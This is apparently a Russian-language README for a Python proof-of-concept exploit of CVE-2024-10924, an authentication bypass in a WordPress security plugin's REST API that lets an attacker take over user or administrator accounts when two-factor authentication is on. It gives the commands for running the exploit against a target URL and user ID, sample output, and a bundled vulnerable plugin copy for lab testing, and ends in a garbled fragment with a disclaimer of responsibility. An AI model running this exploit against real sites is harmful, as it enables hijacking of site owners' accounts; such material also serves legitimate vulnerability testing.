
POC для CVE-2024-10924, написанный на Python
Ошибка обработки ошибок в REST API плагина Really Simple Plugins для WordPress (версии с 9.0.0 по 9.1.1.1 включительно) позволяет атакующему, когда включена двухфакторная аутентификация, обойти аутентификацию и получить контроль над существующей учётной записью пользователя или администратора.
Поскольку я добрый человек, вы также найдёте версию 9.1.1.1 плагина. Просто распакуйте и загрузите её в папку wp-content/plugins. Не забудьте активировать плагин и включить 2FA.
Установите необходимые зависимости с помощью pip:
pip install -r requirements.txt
python exploit.py [-id USER_ID] URL
С указанием ID пользователя:
python exploit.py -id 10 http://localhost:8886/
Это отправляет полезную нагрузку с ID пользователя 10.
Без указания ID пользователя:
python exploit.py http://localhost
По умолчанию ID пользователя равен 1.
session_id=xyz123; path=/; HttpOnly
--------------------------------------------------
Exploit failed. Maybe the target is not vulnerable or the user ID is incorrect.
verify=False) только при необходимости для тестирования.Не знаю, но я не несу ответственности ни за что.